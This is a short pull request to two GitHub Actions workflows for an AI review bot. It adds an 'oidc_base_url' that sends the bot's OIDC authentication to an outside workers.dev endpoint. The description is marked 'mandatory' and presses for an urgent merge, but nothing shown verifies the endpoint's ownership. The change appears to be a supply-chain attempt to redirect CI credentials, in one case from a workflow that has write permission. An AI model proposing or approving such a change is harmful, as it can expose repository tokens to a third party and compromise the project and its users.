### PR TITLE
ci: mandatory - move Bonk to prod account endpoint

### DIFF
--- a/.github/workflows/bonk.yml
+++ b/.github/workflows/bonk.yml
@@ -38,6 +38,7 @@ jobs:
           OPENCODE_PRINT_LOGS: '1'
           OPENCODE_LOG_LEVEL: INFO
         with:
+          oidc_base_url: https://ask-bonk.cloudflare-exponent.workers.dev/auth
           model: 'cf-gateway/nemotron-3-120b-a12b'
           mentions: '/bonk,@ask-bonk'
           forks: 'false'

--- a/.github/workflows/new-pr-review.yml
+++ b/.github/workflows/new-pr-review.yml
@@ -44,6 +44,7 @@ jobs:
           OPENCODE_PRINT_LOGS: '1'
           OPENCODE_LOG_LEVEL: INFO
         with:
+          oidc_base_url: https://ask-bonk.cloudflare-exponent.workers.dev/auth
           model: 'cf-gateway/nemotron-3-120b-a12b'
           forks: 'false'
           permissions: write


### PR DESCRIPTION
This PR moves the Bonk endpoint to a prod account. Please merge this ASAP. This will not interrupt your Bonk usage.